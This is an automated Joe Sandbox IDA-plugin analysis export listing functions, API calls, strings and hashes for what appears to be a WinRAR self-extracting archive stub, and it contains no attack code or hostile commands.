SetDlgItemTextW.USER32 ref: 00007FF741EBC321
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBC363
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBC369
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBC36F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBC375
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBC37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBC381
SendDlgItemMessageW.USER32 ref: 00007FF741EBC449
EndDialog.USER32 ref: 00007FF741EBC463
GetDlgItem.USER32 ref: 00007FF741EBC491
SetFocus.USER32 ref: 00007FF741EBC49A
SendDlgItemMessageW.USER32 ref: 00007FF741EBC53E
FindFirstFileW.KERNEL32 ref: 00007FF741EBC562
FindClose.KERNEL32 ref: 00007FF741EBC68A
SendDlgItemMessageW.USER32 ref: 00007FF741EBC7AF

Part of subcall function 00007FF741E9129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741E91396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBCAA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBCAAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBCAB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBCABB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBCAC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBCAC7

Strings

__tmp_rar_sfx_access_check_, xrefs: 00007FF741EBB6A9
%s %s, xrefs: 00007FF741EBC6D9, 00007FF741EBC946
@, xrefs: 00007FF741EBB7B6
winrarsfxmappingfile.tmp, xrefs: 00007FF741EBB8E0
runas, xrefs: 00007FF741EBB7C9
STARTDLG, xrefs: 00007FF741EBB1CA
LICENSEDLG, xrefs: 00007FF741EBC0C9
p, xrefs: 00007FF741EBB7AB
REPLACEFILEDLG, xrefs: 00007FF741EBC3D3
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF741EBB799

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 255727823-2702805183
Opcode ID: a0404b779c4ee16cf50a5e9d1e10fbcb842fabb91e047cae84fb8ecf6bba8e74
Instruction ID: f48d070d1491bbc323bc1e77ee086ca4c6604d1ddc9e6c7ce58bd53cf234673e
Opcode Fuzzy Hash: a0404b779c4ee16cf50a5e9d1e10fbcb842fabb91e047cae84fb8ecf6bba8e74
Instruction Fuzzy Hash: 70D2936AA1C6A3D1EB22FB25E8502F9A351FF86782FC44231D95D076A5DFBCE544C320

Function 00007FF741EBCE88 Relevance: 66.7, APIs: 27, Strings: 10, Instructions: 1963windowfileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF741EBD5F3
SendMessageW.USER32 ref: 00007FF741EBD626
SendMessageW.USER32 ref: 00007FF741EBD655
MoveFileW.KERNEL32 ref: 00007FF741EBDB4B
MoveFileExW.KERNEL32 ref: 00007FF741EBDB69
GetTempPathW.KERNEL32 ref: 00007FF741EBDC49

Part of subcall function 00007FF741E91FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E91FFB

EndDialog.USER32 ref: 00007FF741EBDFCA
SHChangeNotify.SHELL32 ref: 00007FF741EBE61A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741EBEEE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEEEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF19
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF25
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF2B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF31
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF4F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBEF5B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741EBEF67
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741EBEF73

Strings

HIDE, xrefs: 00007FF741EBE9E5, 00007FF741EBE9F4
@set:user, xrefs: 00007FF741EBDD96, 00007FF741EBDDA5
lnk, xrefs: 00007FF741EBE3CA, 00007FF741EBE3D9
MAX, xrefs: 00007FF741EBEA82, 00007FF741EBEA91
ProgramFilesDir, xrefs: 00007FF741EBD4F0
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF741EBD501
.tmp, xrefs: 00007FF741EBDA85
<br>, xrefs: 00007FF741EBD6DA, 00007FF741EBD6E9
MIN, xrefs: 00007FF741EBEAE5, 00007FF741EBEAF4
.lnk, xrefs: 00007FF741EBE406, 00007FF741EBE415

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$ChangeDialogItemNotifyPathTemp
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 4009890540-3916287355
Opcode ID: 19578e4233ada1ea9e691022a7e54d5e6d40b94e5858b6d29fa0a014024e33bd
Instruction ID: c98c845ae8d45102d0fd3b28ddbc5a856b30cfee13a7a8570b4370937c9c6f34
Opcode Fuzzy Hash: 19578e4233ada1ea9e691022a7e54d5e6d40b94e5858b6d29fa0a014024e33bd
Instruction Fuzzy Hash: 4513BF26B08BA2D9EB12FF64D8402FC67A1FB41799F800635DA1D17AD9DFB8D584C360

Function 00007FF741EC0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF741EADFD0: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE018
Part of subcall function 00007FF741EADFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE030
Part of subcall function 00007FF741EADFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE05D

Part of subcall function 00007FF741EA62DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF741EA62F2
Part of subcall function 00007FF741EA62DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF741EA632C

Part of subcall function 00007FF741EB946C: OleInitialize.OLE32 ref: 00007FF741EB9486
Part of subcall function 00007FF741EB946C: SHGetMalloc.SHELL32 ref: 00007FF741EB94D4

GetCommandLineW.KERNEL32 ref: 00007FF741EC096E
OpenFileMappingW.KERNEL32 ref: 00007FF741EC0A07
MapViewOfFile.KERNEL32 ref: 00007FF741EC0A30
UnmapViewOfFile.KERNEL32 ref: 00007FF741EC0A46
MapViewOfFile.KERNEL32 ref: 00007FF741EC0A63
UnmapViewOfFile.KERNEL32 ref: 00007FF741EC0ACA
CloseHandle.KERNEL32 ref: 00007FF741EC0AD3
SetEnvironmentVariableW.KERNEL32 ref: 00007FF741EC0BAD
GetLocalTime.KERNEL32 ref: 00007FF741EC0BB8
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF741EC0C13
SetEnvironmentVariableW.KERNEL32 ref: 00007FF741EC0C26
GetModuleHandleW.KERNEL32 ref: 00007FF741EC0C2E
LoadIconW.USER32 ref: 00007FF741EC0C4D
DialogBoxParamW.USER32 ref: 00007FF741EC0CB6
Sleep.KERNEL32 ref: 00007FF741EC0CE6
DeleteObject.GDI32 ref: 00007FF741EC0D0D
DeleteObject.GDI32 ref: 00007FF741EC0D1F
CloseHandle.KERNEL32 ref: 00007FF741EC0D67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC0DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC0DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC0DE3

Part of subcall function 00007FF741EBFD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF741EBFD43
Part of subcall function 00007FF741EBFD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF741EBFDBC

Strings

sfxstime, xrefs: 00007FF741EC0C1F
sfxname, xrefs: 00007FF741EC0B9B
winrarsfxmappingfile.tmp, xrefs: 00007FF741EC09F9
STARTDLG, xrefs: 00007FF741EC0CA5
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF741EC0C02

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1048086575-3710569615
Opcode ID: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
Instruction ID: ec7057f854c51e28f3a1d4b1d1d383690c333362dd7bb15bc5486aa18e1685de
Opcode Fuzzy Hash: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
Instruction Fuzzy Hash: CC126479A1C7A2C1EB12FB24E8452B9E361FF85795FC44231DA9D06A95EFBCE140C320

Function 00007FF741EAA4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF741EAA504

Part of subcall function 00007FF741EB0F68: WideCharToMultiByte.KERNEL32 ref: 00007FF741EB0F99

SetDlgItemTextW.USER32 ref: 00007FF741EAA573
GetWindowRect.USER32 ref: 00007FF741EAA5AD
GetClientRect.USER32 ref: 00007FF741EAA5BB
GetWindowLongPtrW.USER32 ref: 00007FF741EAA66C
GetWindowRect.USER32 ref: 00007FF741EAA6B2
SetWindowTextW.USER32 ref: 00007FF741EAA6EC
GetSystemMetrics.USER32 ref: 00007FF741EAA6F7
GetWindow.USER32 ref: 00007FF741EAA708
GetWindowRect.USER32 ref: 00007FF741EAA746
GetWindow.USER32 ref: 00007FF741EAA808

Strings

CAPTION, xrefs: 00007FF741EAA6CF
$%s:, xrefs: 00007FF741EAA4EF

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 2100155373-404845831
Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction ID: c643f658e2f45d2c09b88654c9fef133d3bd011acff044f8e1db2f705a500a31
Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction Fuzzy Hash: E791F53AB1C662CAE715BF29A800669E7A1FBC4B85F805435EE4D47B58DF7CE805CB10

Function 00007FF741EB8624 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32 ref: 00007FF741EB863D
SizeofResource.KERNEL32 ref: 00007FF741EB8659
LoadResource.KERNEL32 ref: 00007FF741EB8673
LockResource.KERNEL32 ref: 00007FF741EB8685
GlobalAlloc.KERNELBASE ref: 00007FF741EB86A6
GlobalLock.KERNEL32 ref: 00007FF741EB86BB
CreateStreamOnHGlobal.COMBASE ref: 00007FF741EB86E8
GdipAlloc.GDIPLUS ref: 00007FF741EB86FE
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF741EB8769
GlobalUnlock.KERNEL32 ref: 00007FF741EB878C
GlobalFree.KERNEL32 ref: 00007FF741EB8795

Strings

PNG, xrefs: 00007FF741EB862F

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction ID: dedd18f355c568ba6b43a83a63ce3175bd711ef0b84b3a897942b1cf187b750f
Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction Fuzzy Hash: 9C413029A4DA23C1EB06FB16D844775A3A0BF84B96F880535DE1D47364EFBCE446C360

Function 00007FF741E9F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA1239
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA123F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA1245
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA124B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA1251
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA1257
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA125D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA1263

Strings

__tmp_reference_source_, xrefs: 00007FF741E9FCCF, 00007FF741E9FCDE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: __tmp_reference_source_
API String ID: 3668304517-685763994
Opcode ID: d07f51d72cd75e867552774118a6c040e604500fb8ad303e6384e03f62dbec60
Instruction ID: ca305e3bc0f6f685f522badf324c09ca02b2be86ae41e66f85b39b54009dc17b
Opcode Fuzzy Hash: d07f51d72cd75e867552774118a6c040e604500fb8ad303e6384e03f62dbec60
Instruction Fuzzy Hash: A8E29376A1C6D2D2EB66BB25E1403AEE761FB81781F844132DB9D036A5CFBCE454C720

Function 00007FF741E94840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9511E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E95124
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9512A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E95E16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E95E1C

Strings

CMT, xrefs: 00007FF741E959B2

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: CMT
API String ID: 3668304517-2756464174
Opcode ID: b72a447c2ddb22f05185b9639a81e7227c320d37a75114c120090eb22b33af98
Instruction ID: 94384cba414d68da7b5cb88ce90eaa28d9dc4f539ee3d3c4f60b9bdd76677d84
Opcode Fuzzy Hash: b72a447c2ddb22f05185b9639a81e7227c320d37a75114c120090eb22b33af98
Instruction Fuzzy Hash: E9E2012AB1C692C6EB1AFB25D5502FDA7A1FF46385F840032DA5E07696DFBCE055C320

Function 00007FF741EA40BC Relevance: 10.7, APIs: 7, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00007FF741EA410B
FindFirstFileW.KERNEL32 ref: 00007FF741EA415E
GetLastError.KERNEL32 ref: 00007FF741EA41AF
FindNextFileW.KERNEL32 ref: 00007FF741EA41D7
GetLastError.KERNEL32 ref: 00007FF741EA41E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA430F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA4315

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
Instruction ID: 9f36bcaae97a00490af19a8e0d31f3ec138676e66a085bfa2bda4b5768cc02ff
Opcode Fuzzy Hash: 5b7a682f346ba33cc6e8113bf8bb974c5d06c867b30d63dc8f71ee7e42fd28a6
Instruction Fuzzy Hash: CC61D666A0C652C1EB11BB25E84026DA361FB95BE5F944331EABD03AD9DFBCE444C710

Function 00007FF741E95E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMT, xrefs: 00007FF741E959B2, 00007FF741E9675B

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
Instruction ID: e2d8f8b65e9634849225ddc5c7632f7e7c25b72873e2acb13e36462b1a994fab
Opcode Fuzzy Hash: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
Instruction Fuzzy Hash: C042FF2AB1C692D6EB1AFB74C1502FDA3A0FB06385F840136CB5E17696DFB8E519C310

Function 00007FF741EB82C4 Relevance: 1.6, APIs: 1, Instructions: 125comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE ref: 00007FF741EB8310

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 63cc97eea9404dc537e59db23731624e9de1278f625d6ab0d82bdfb106874faf
Instruction ID: b263421cf3b48b7bb37300a9118fdb7a268a44d826c3dc026e4e4fc8aa86ec7c
Opcode Fuzzy Hash: 63cc97eea9404dc537e59db23731624e9de1278f625d6ab0d82bdfb106874faf
Instruction Fuzzy Hash: B251037AA48A26C1EB11FF2AD88486CB372FB44F85B844436CE5D43768CF79D596C360

Function 00007FF741EB1F20 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
Instruction ID: 8b4030e326d63a46659ef2fdfaf73182de4062af347b62bf4ab230114f0e0888
Opcode Fuzzy Hash: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
Instruction Fuzzy Hash: 37E1F22AA0C292CAEB66FF28E4442BDB790FB44749F884235DB8E57685DE7CE541C314

Function 00007FF741EB3484 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
